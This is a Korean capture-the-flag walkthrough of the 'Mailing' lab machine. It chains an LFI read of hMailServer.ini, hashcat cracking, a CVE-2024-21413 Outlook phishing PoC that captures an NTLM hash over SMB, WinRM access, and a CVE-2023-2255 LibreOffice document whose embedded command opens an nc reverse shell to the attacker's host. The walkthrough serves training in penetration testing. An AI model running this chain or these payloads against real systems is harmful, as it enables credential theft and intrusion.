1. 개요
1.1. nmap
┌──(root㉿kali)-[/home/kali/labs/Mailing]
└─# nmap -sCV 10.129.232.39 --max-retries 1 --min-rate 5000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-07 08:17 +04
Nmap scan report for 10.129.232.39
Host is up (0.18s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://mailing.htb
|_http-server-header: Microsoft-IIS/10.0
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: TOP USER UIDL
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: RIGHTS=texkA0001 IDLE completed ACL IMAP4 QUOTA CHILDREN CAPABILITY OK IMAP4rev1 NAMESPACE SORT
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
587/tcp open smtp hMailServer smtpd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
993/tcp open ssl/imap hMailServer imapd
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: RIGHTS=texkA0001 IDLE completed ACL IMAP4 QUOTA CHILDREN CAPABILITY OK IMAP4rev1 NAMESPACE SORT
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open pando-pub?
49571/tcp open msrpc Microsoft Windows RPC
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-01-07T04:20:42
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 236.84 seconds
1.2. Web Discovery
웹 페이지를 서비스하고 있고, mailing.htb 로 리다이렉트 된다. 그래서 /etc/hosts 에 등록을 하고 접근하면 아래와 같은 페이지가 나온다.
하단에 Instruction 을 다운받을 수 있는 버튼이 있다.
해당 파일을 다운받으면 pdf 파일을 다운받을 수 있는데, 맨 마지막 페이지인 16페이지에 Maya 라는 이름과 maya@mailing.htb 의 아이디를 알 수 있다.
2. 내부망 침투
2.1. LFI 취약점 확인
LFI 취약점이 file 파라미터에서 작동하는 것을 확인했다.
┌──(root㉿kali)-[/home/kali/labs/Mailing]
└─# curl http://mailing.htb/download.php?file=../../windows/system32/drivers/etc/hosts
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
127.0.0.1 mailing.htb
2.2. hMailServer.ini 파일 톺아보기
hMailServer.ini 파일이 해당 시스템에 대한 설정 파일이고 ../../Program+Files+(x86)/hMailServer/bin/hMailServer.ini 에 해당 파이리 존재하므로, 내용물을 확인한다. 그러면 AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7 의 구문을 확인할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Mailing]
└─# curl 'http://mailing.htb/download.php?file=../../Program+Files+(x86)/hMailServer/bin/hMailServer.ini'
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
해당 해쉬는 md5 해쉬로 hashcat 을 통해서 복호화를 시도한다. 결과적으로 administrator 계정에 대해서 homenetworkingadministrator 의 비밀번호를 획득할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Mailing]
└─# echo '841bb5acfa6779ae432fd7a4e6600ba7' > hash
┌──(root㉿kali)-[/home/kali/labs/Mailing]
└─# hashcat hash /usr/share/wordlists/rockyou.txt -m 0
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 2909/5883 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
841bb5acfa6779ae432fd7a4e6600ba7:homenetworkingadministrator
[...SNIP...]
2.3. 메일 시스템 취약점 이용
CVE-2024-21413 는 해당 메일 시스템에 대해서 RCE 취약점을 갖고 있다. 따라서 아래의 경로에서 github 를 통해서 클론한다.
┌──(root㉿kali)-[/home/kali/labs/Mailing]
└─# git clone https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
Cloning into 'CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability'...
remote: Enumerating objects: 28, done.
remote: Counting objects: 100% (28/28), done.
remote: Compressing objects: 100% (27/27), done.
remote: Total 28 (delta 7), reused 6 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (28/28), 14.48 KiB | 2.07 MiB/s, done.
Resolving deltas: 100% (7/7), done.
해당 취약점은 file:///\공격자IP\test\file.txt 와 같이 링크를 첨부했을 때 그걸 받아보는 사람이 클릭을 하게 되면 Outlook 서비스에서는 경고성 문구를 띄운다. file:///\공격자IP\test\file.txt!any_string 와 같이 ! 를 붙이고 뒤에 아무 문자열이나 넣으면 그런 경고성 문구가 나지 않게 만드는 거다.
┌──(root㉿kali)-[/home/kali/labs/Mailing/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability]
└─# python CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender test@mailing.htb --recipient maya@mailing.htb --url "\\10.10.14.143\share\ex" --subject "test"
CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC.
Alexander Hagenah / @xaitax / ah@primepage.de
✅ Email sent successfully.
해당 메일을 보내고 smbserver 를 켜놓으면 링크를 클릭하는 모션이 나오게 되는데, 그 경우에 내 kali 서버에 접근해서 maya 계정을 통해서 해쉬값이 날아온다.
┌──(root㉿kali)-[/home/kali]
└─# impacket-smbserver share . -smb2support
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.129.232.39,58440)
[*] AUTHENTICATE_MESSAGE (MAILING\maya,MAILING)
[*] User MAILING\maya authenticated successfully
[*] maya::MAILING:aaaaaaaaaaaaaaaa:2c43ba66185b120c2aee555362f37dd8:010100000000000000926bc6977fdc016067c32f4afb7675000000000100100041004200510058004b00430045004f000300100041004200510058004b00430045004f0002001000450069004c0065004f00730071006d0004001000450069004c0065004f00730071006d000700080000926bc6977fdc01060004000200000008003000300000000000000000000000002000006bef4fade26d91db97f0a8e73ce0facf77e36aed2b142e46bb03710cfed777fa0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100340033000000000000000000
[...SNIP...]
2.4. maya 계정 크리데셜 탈취
smbserver 를 통해 탈취한 해쉬를 복호화하면 비밀번호가 m4y4ngs4ri 와 같이 나온다.
┌──(root㉿kali)-[/home/kali/labs/Mailing]
└─# hashcat maya /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 2909/5883 MB (1024 MB allocatable), 4MCU
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
5600 | NetNTLMv2 | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
MAYA::MAILING:aaaaaaaaaaaaaaaa:2c43ba66185b120c2aee555362f37dd8:010100000000000000926bc6977fdc016067c32f4afb7675000000000100100041004200510058004b00430045004f000300100041004200510058004b00430045004f0002001000450069004c0065004f00730071006d0004001000450069004c0065004f00730071006d000700080000926bc6977fdc01060004000200000008003000300000000000000000000000002000006bef4fade26d91db97f0a8e73ce0facf77e36aed2b142e46bb03710cfed777fa0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100340033000000000000000000:m4y4ngs4ri
[...SNIP...]
2.5. shell 획득
nxc 를 통해서 winrm 이 가능한 지를 확인한다. 그리고 가능성을 확인했다.
┌──(root㉿kali)-[/home/kali/labs/Mailing]
└─# nxc winrm 10.129.232.39 -u 'maya' -p 'm4y4ngs4ri'
WINRM 10.129.232.39 5985 MAILING [*] Windows 10 / Server 2019 Build 19041 (name:MAILING) (domain:MAILING)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.232.39 5985 MAILING [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)
evil-wrinrm 을 통해서 로그인에 성공하고, user.txt 를 통해서 flag 를 획득한다.
┌──(root㉿kali)-[/home/kali/labs/Mailing]
└─# evil-winrm -i 10.129.232.39 -u 'maya' -p 'm4y4ngs4ri'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maya\Documents> type ..\Desktop\user.txt
3. 권한 상승
3.1. 권한 확인
먼저 maya 계정에서 어떤 작업이 가능한지 권한을 확인한다. 특별한 권한을 갖고 있지 않아서 취약한 권한을 통해서 트리거하는 것은 힘들 것으로 생각된다.
*Evil-WinRM* PS C:\Users\maya\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================================ =======
SeChangeNotifyPrivilege Omitir comprobaci¢n de recorrido Enabled
SeUndockPrivilege Quitar equipo de la estaci¢n de acoplamiento Enabled
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Enabled
SeTimeZonePrivilege Cambiar la zona horaria Enabled
*Evil-WinRM* PS C:\Users\maya\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================ ================ ============ ==================================================
Todos Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios de escritorio remoto Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Usuarios autentificados Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Esta compa¤¡a Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Autenticaci¢n NTLM Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Etiqueta obligatoria\Nivel obligatorio medio Label S-1-16-8192
3.2. PoC 를 통한 취약점 확인
Program Files 에 접근해서 취약한 프로그램을 이용하는지 확인한다. 그 중에서 LibreOffice 프로그램에 눈에 들어온다.
*Evil-WinRM* PS C:\Program Files> dir
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/27/2024 5:30 PM Common Files
d----- 3/3/2024 4:40 PM dotnet
d----- 3/3/2024 4:32 PM Git
d----- 4/29/2024 6:54 PM Internet Explorer
d----- 3/4/2024 6:57 PM LibreOffice
d----- 3/3/2024 4:06 PM Microsoft Update Health Tools
d----- 12/7/2019 10:14 AM ModifiableWindowsApps
d----- 2/27/2024 4:58 PM MSBuild
d----- 2/27/2024 5:30 PM OpenSSL-Win64
d----- 3/13/2024 4:49 PM PackageManagement
d----- 2/27/2024 4:58 PM Reference Assemblies
d----- 3/13/2024 4:48 PM RUXIM
d----- 2/27/2024 4:32 PM VMware
d----- 3/3/2024 5:13 PM Windows Defender
d----- 4/29/2024 6:54 PM Windows Defender Advanced Threat Protection
d----- 3/3/2024 5:13 PM Windows Mail
d----- 3/3/2024 5:13 PM Windows Media Player
d----- 4/29/2024 6:54 PM Windows Multimedia Platform
d----- 2/27/2024 4:26 PM Windows NT
d----- 3/3/2024 5:13 PM Windows Photo Viewer
d----- 4/29/2024 6:54 PM Windows Portable Devices
d----- 12/7/2019 10:31 AM Windows Security
d----- 3/13/2024 4:49 PM WindowsPowerShell
CVE-2023-2255 의 취약점은 LibreOffice 에 대한 취약점을 트리거 하는 PoC 이다. 해당 파일을 github 에서 클론한다.
┌──(root㉿kali)-[/home/kali/labs/Mailing]
└─# git clone https://github.com/elweth-sec/CVE-2023-2255.git
Cloning into 'CVE-2023-2255'...
remote: Enumerating objects: 10, done.
remote: Counting objects: 100% (10/10), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 10 (delta 2), reused 5 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (10/10), 8.47 KiB | 8.47 MiB/s, done.
Resolving deltas: 100% (2/2), done.
3.3. Libre Office 취약점 활용
문서 열람 프로그램은 해당 파일을 열 때 매크로나 외부링크 포함 시 알림을 한 번 띄우고 신뢰성 여부를 확인한다. 하지만 이 취약점은 그 과정을 건너 뛰게 된다. 그래서 공격자가 만든 악의적 매크로를 자동으로 실행하게 만든다.
그래서 우리는 nc 를 통해서 리버스 쉘을 맺게 만드는 스크립트를 가진 exploit.odt 파일을 만든다. 그리고 일정 시간동안 자동으로 파일을 한 번씩 확인하는 important documents 폴더에다가 업로드를 진행한다.
┌──(root㉿kali)-[/home/kali/labs/Mailing]
└─# cd CVE-2023-2255
┌──(root㉿kali)-[/home/kali/labs/Mailing/CVE-2023-2255]
└─# ls
CVE-2023-2255.py README.md samples webshell.php
┌──(root㉿kali)-[/home/kali/labs/Mailing/CVE-2023-2255]
└─# python CVE-2023-2255.py --cmd 'cmd.exe /c C:\ProgramData\nc.exe -e cmd.exe 10.10.14.143 443' --output exploit.odt
File exploit.odt has been created !
┌──(root㉿kali)-[/home/kali/labs/Mailing/CVE-2023-2255]
└─# ll
total 48
-rw-r--r-- 1 root root 1382 Jan 7 10:21 CVE-2023-2255.py
-rw-r--r-- 1 root root 30550 Jan 7 10:23 exploit.odt
-rw-r--r-- 1 root root 388 Jan 7 10:21 README.md
drwxr-xr-x 2 root root 4096 Jan 7 10:21 samples
-rw-r--r-- 1 root root 25 Jan 7 10:21 webshell.php
┌──(root㉿kali)-[/home/kali/labs/Mailing/CVE-2023-2255]
└─# smbclient '//10.129.232.39/important documents' --user maya --password m4y4ngs4ri
Try "help" to get a list of possible commands.
smb: \> put exploit.odt
putting file exploit.odt as \exploit.odt (37.2 kb/s) (average 37.2 kb/s)
smb: \>
3.4. 관리자 권한 획득
그러고 443 번 포트를 열어놓고 잠시 대기하면 관리자 권한의 쉘을 획득하는 것을 확인할 수 있다.
┌──(root㉿kali)-[/home/kali/labs/Mailing]
└─# rlwrap -cAr nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.143] from (UNKNOWN) [10.129.232.39] 64881
Microsoft Windows [Version 10.0.19045.4355]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files\LibreOffice\program>whoami
whoami
mailing\localadmin
C:\Program Files\LibreOffice\program>cd C:\Users
cd C:\Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9502-BA18
Directory of C:\Users
2024-03-03 04:19 PM <DIR> .
2024-03-03 04:19 PM <DIR> ..
2024-02-28 08:50 PM <DIR> .NET v2.0
2024-02-28 08:50 PM <DIR> .NET v2.0 Classic
2024-02-28 08:50 PM <DIR> .NET v4.5
2024-02-28 08:50 PM <DIR> .NET v4.5 Classic
2024-02-28 08:50 PM <DIR> Classic .NET AppPool
2024-03-09 01:52 PM <DIR> DefaultAppPool
2024-03-04 08:32 PM <DIR> localadmin
2024-02-28 07:34 PM <DIR> maya
2024-03-10 04:56 PM <DIR> Public
0 File(s) 0 bytes
11 Dir(s) 4,628,033,536 bytes free
C:\Users>type .\localadmin\Desktop\root.txt